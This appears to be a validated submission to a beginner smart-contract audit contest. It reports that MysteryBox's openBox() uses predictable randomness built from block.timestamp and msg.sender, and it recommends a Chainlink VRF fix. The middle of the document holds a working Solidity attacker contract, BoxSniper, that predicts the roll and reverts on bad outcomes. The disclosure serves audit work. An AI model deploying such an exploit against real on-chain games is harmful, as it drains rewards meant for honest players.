Mystery Box

First Flight #25
Beginner Friendly, Foundry
100 EXP
Submission Details
Severity: medium
Valid

Users can obtain higher rewards because randomValue is predictable

Summary

Users can obtain higher rewards because randomValue is predictable

Vulnerability Details

In MysteryBox, a user who owns a box calls openBox(), which derives one random value and hands out a reward tier based on it. The problem is that the random value is computed only from block.timestamp and msg.sender, both of which the caller knows at the moment of the call: block.timestamp is the timestamp of the block the transaction lands in, and msg.sender is the caller's own address.
A user can therefore compute randomValue ahead of time and open the box only in a block whose timestamp yields the maximum reward. Calling from a contract makes this reliable: the contract recomputes the value in the same block, reverts if it is not good enough, and only then calls openBox(), so an unlucky roll never consumes a box.

function openBox() public {
    require(boxesOwned[msg.sender] > 0, "No boxes to open");
    // Generate a random number between 0 and 99
    // @audit randomValue depends only on block.timestamp and msg.sender, both known to the caller,
    // so it can be computed before the call and the call timed (or reverted) to land on a high value.
    // randomValue's range is 0 - 99.
    uint256 randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;
    // ... reward tier is selected from randomValue (rest of the function omitted in this submission)
}
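
The attack described above, as an added example that is not part of MysteryBox or of this submission. The attacker contract below must itself own boxes (openBox() checks boxesOwned[msg.sender], and msg.sender for that call is the contract), and it assumes rewards credited to the contract can later be collected; the IMysteryBox interface and every name in BoxSniper are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal view of the target; only openBox() is taken from the submission.
interface IMysteryBox {
    function openBox() external;
}

// Hypothetical attacker contract (not part of MysteryBox or the submission).
contract BoxSniper {
    IMysteryBox public immutable box;
    address public immutable owner;

    constructor(IMysteryBox _box) {
        box = _box;
        owner = msg.sender;
    }

    // Exactly the formula used in openBox(), evaluated for an arbitrary timestamp.
    // msg.sender inside openBox() will be this contract's address.
    function predictAt(uint256 ts) public view returns (uint256) {
        return uint256(keccak256(abi.encodePacked(ts, address(this)))) % 100;
    }

    // The value openBox() would produce if it were called in the current block.
    function predictNow() public view returns (uint256) {
        return predictAt(block.timestamp);
    }

    // Off-chain planning helper: scan forward to the next timestamp whose roll
    // meets the threshold, so the owner knows roughly when to submit.
    function nextWinningTimestamp(uint256 threshold, uint256 horizonSeconds)
        external
        view
        returns (uint256 ts, uint256 value)
    {
        for (uint256 i = 0; i <= horizonSeconds; i++) {
            ts = block.timestamp + i;
            value = predictAt(ts);
            if (value >= threshold) return (ts, value);
        }
        revert("no winning timestamp within horizon");
    }

    // Only consume a box when the roll is good enough. If the block the
    // transaction lands in does not give a winning value, the whole call
    // reverts and the box is kept for a later attempt: the attacker loses
    // only gas, never a box.
    function openIfLucky(uint256 threshold) external {
        require(msg.sender == owner, "not owner");
        require(predictNow() >= threshold, "unlucky block, try again");
        box.openBox();
    }
}
```

The attacker cannot choose block.timestamp exactly, which is why the revert guard in openIfLucky matters more than nextWinningTimestamp: the transaction can simply be resubmitted until it lands in a block whose timestamp produces the wanted value, and no box is ever spent on a bad roll.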

Impact

Because block.timestamp and msg.sender are known to the caller before the transaction is sent, randomValue is fully predictable. A user can precompute the outcome for upcoming timestamps and call openBox() only when it yields the top reward tier, or call through a contract that reverts on any other value so that a box is never spent on a bad roll. The intended reward odds are defeated: a motivated user always wins this game.

Tools Used

Manual review

Recommendations

Consider using a verifiable random function (VRF) supplied by an oracle, such as Chainlink VRF, to generate the random value instead of deriving it from block.timestamp and msg.sender. With a VRF the box is consumed when randomness is requested and the value only arrives later in a callback, so the caller cannot learn it before committing. Other block variables (block.prevrandao, blockhash) are equally observable by the caller and are not a fix.
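
One way to implement the recommendation, as an added example that is not the project's own code. It uses the Chainlink VRF v2.5 consumer base; the import paths, coordinator address, key hash, subscription id and gas parameters are assumptions that must match the target network, and the reward tiers in _rewardFor are illustrative because the submission does not show the project's own table.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Import paths assumed to match the Chainlink contracts package in use.
import {VRFConsumerBaseV2Plus} from "@chainlink/contracts/src/v0.8/vrf/dev/VRFConsumerBaseV2Plus.sol";
import {VRFV2PlusClient} from "@chainlink/contracts/src/v0.8/vrf/dev/libraries/VRFV2PlusClient.sol";

contract MysteryBoxVRF is VRFConsumerBaseV2Plus {
    struct Reward {
        string name;
        uint256 value;
    }

    mapping(address => uint256) public boxesOwned;
    mapping(address => Reward[]) public rewardsOwned;
    // requestId -> user who opened the box; address(0) once fulfilled
    mapping(uint256 => address) public pendingOpener;

    bytes32 private immutable keyHash; // VRF gas lane, assumed per network
    uint256 private immutable subId;   // funded VRF subscription, assumed
    uint16 private constant REQUEST_CONFIRMATIONS = 3;
    uint32 private constant CALLBACK_GAS_LIMIT = 200_000;

    event BoxOpenRequested(address indexed user, uint256 indexed requestId);
    event BoxOpened(address indexed user, uint256 indexed requestId, uint256 randomValue);

    constructor(address vrfCoordinator, bytes32 _keyHash, uint256 _subId)
        VRFConsumerBaseV2Plus(vrfCoordinator)
    {
        keyHash = _keyHash;
        subId = _subId;
    }

    // Step 1: the box is consumed now, before anyone knows the random word,
    // so the user can neither wait for a favourable value nor revert on a bad one.
    function openBox() external returns (uint256 requestId) {
        require(boxesOwned[msg.sender] > 0, "No boxes to open");
        boxesOwned[msg.sender] -= 1;

        requestId = s_vrfCoordinator.requestRandomWords(
            VRFV2PlusClient.RandomWordsRequest({
                keyHash: keyHash,
                subId: subId,
                requestConfirmations: REQUEST_CONFIRMATIONS,
                callbackGasLimit: CALLBACK_GAS_LIMIT,
                numWords: 1,
                extraArgs: VRFV2PlusClient._argsToBytes(
                    VRFV2PlusClient.ExtraArgsV1({nativePayment: false})
                )
            })
        );
        pendingOpener[requestId] = msg.sender;
        emit BoxOpenRequested(msg.sender, requestId);
    }

    // Step 2: reachable only by the coordinator (the base contract's
    // rawFulfillRandomWords enforces the caller), with a word the opener
    // could not have known when openBox() was called.
    function fulfillRandomWords(uint256 requestId, uint256[] calldata randomWords) internal override {
        address user = pendingOpener[requestId];
        // Unknown or already-fulfilled id: nothing to do. Do not revert in the
        // callback, since the coordinator does not retry a failed fulfillment.
        if (user == address(0)) return;
        delete pendingOpener[requestId];

        uint256 randomValue = randomWords[0] % 100;
        rewardsOwned[user].push(_rewardFor(randomValue));
        emit BoxOpened(user, requestId, randomValue);
    }

    // Illustrative tiers only; the submission does not show the project's table.
    function _rewardFor(uint256 randomValue) internal pure returns (Reward memory) {
        if (randomValue < 75) return Reward("Coal", 0);
        if (randomValue < 95) return Reward("Bronze Coin", 0.1 ether);
        if (randomValue < 99) return Reward("Silver Coin", 0.5 ether);
        return Reward("Gold Coin", 1 ether);
    }
}
```

The security-relevant change is the split into two transactions: the decrement of boxesOwned happens in openBox(), and the reward is assigned in fulfillRandomWords(), which the user does not control. Mapping requestId to the opener and clearing it on fulfillment keeps one request from being paid twice.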

Updates

Appeal created

inallhonesty Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Randomness
